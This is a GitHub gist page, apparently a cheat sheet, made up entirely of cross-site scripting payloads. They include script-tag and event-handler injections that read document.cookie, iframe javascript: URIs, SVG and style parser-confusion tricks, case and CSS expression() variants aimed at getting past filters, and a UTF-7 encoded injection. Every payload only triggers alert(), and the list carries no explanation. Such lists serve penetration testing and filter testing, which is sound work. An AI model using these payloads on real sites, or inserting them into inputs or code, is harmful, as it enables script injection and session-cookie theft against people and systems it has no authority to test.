Skip to content

Instantly share code, notes, and snippets.

@hakatashi

hakatashi/xss.md

Forked from ntddk/xss.md
Last active August 29, 2015 14:07
Show Gist options
  • Save hakatashi/0a8915f72e4630e30c8c to your computer and use it in GitHub Desktop.
Save hakatashi/0a8915f72e4630e30c8c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
xss.md
  • '';!--"<XSS>=&{()}``\"
  • <script>alert(XSS);</script>
  • "><script>alert(XSS);</script>
  • <ScrIpt>alert(1);</SCript>
  • <a onmouseover="alert(document.cookie)">XSS</a>
  • <a onmouseover=alert(document.cookie)>XSS</a>
  • <<script>alert("XSS");//<</script>
  • <iframe src="javascript:alert('XSS');"></iframe>
  • <iframe src=# onmouseover="alert(document.cookie)"></iframe>
  • <img src="http://www.example.com/>"onerror="alert(document.cookie)//<">
  • <![CDATA["><script>alert("XSS")</script><!--]]>
  • ";alert(document.domain)//
  • <SELECT NAME="" onmouseover=alert(XSS)></select>
  • <style><img src='</style><img src=x onerror=alert("XSS")//'>
  • <svg><style><img/src=x onerror=alert(XSS)// </b>
  • "><svg><script>alert&#40/1/.source&#41</script>
  • <div style="left:expression(alert('XSS'))">
  • <div style="left:expRessioN(alert('XSS'))">
  • +ADw-/title+AD4APA-meta http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4APA-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment